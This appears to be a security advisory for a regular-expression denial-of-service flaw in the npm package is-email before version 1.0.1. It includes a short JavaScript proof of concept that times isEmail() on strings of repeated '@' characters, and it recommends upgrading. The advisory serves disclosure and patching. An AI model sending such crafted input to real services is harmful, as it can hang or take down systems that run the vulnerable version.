Vulnerability	Vulnerable Version
M Regular Expression Denial of Service (ReDoS) is-email is a Loosely validate an email address. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isEmail()` function. PoC: `var isEmail = require("is-email") function build_blank(n) { var ret = "" for (var i = 0; i < n; i++) { ret += "@" } return ret + "!"; } for(var i = 1; i <= 5000000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_blank(i) isEmail(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `is-email` to version 1.0.1 or higher.	<1.0.1

Regular Expression Denial of Service (ReDoS)

is-email is a Loosely validate an email address.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isEmail() function.

PoC:

var isEmail = require("is-email")
function build_blank(n) {
 var ret = ""
 for (var i = 0; i < n; i++) {
  ret += "@"
 }
 return ret + "!";
}

for(var i = 1; i <= 5000000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_blank(i)
        isEmail(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade is-email to version 1.0.1 or higher.

<1.0.1

Go back to all versions of this package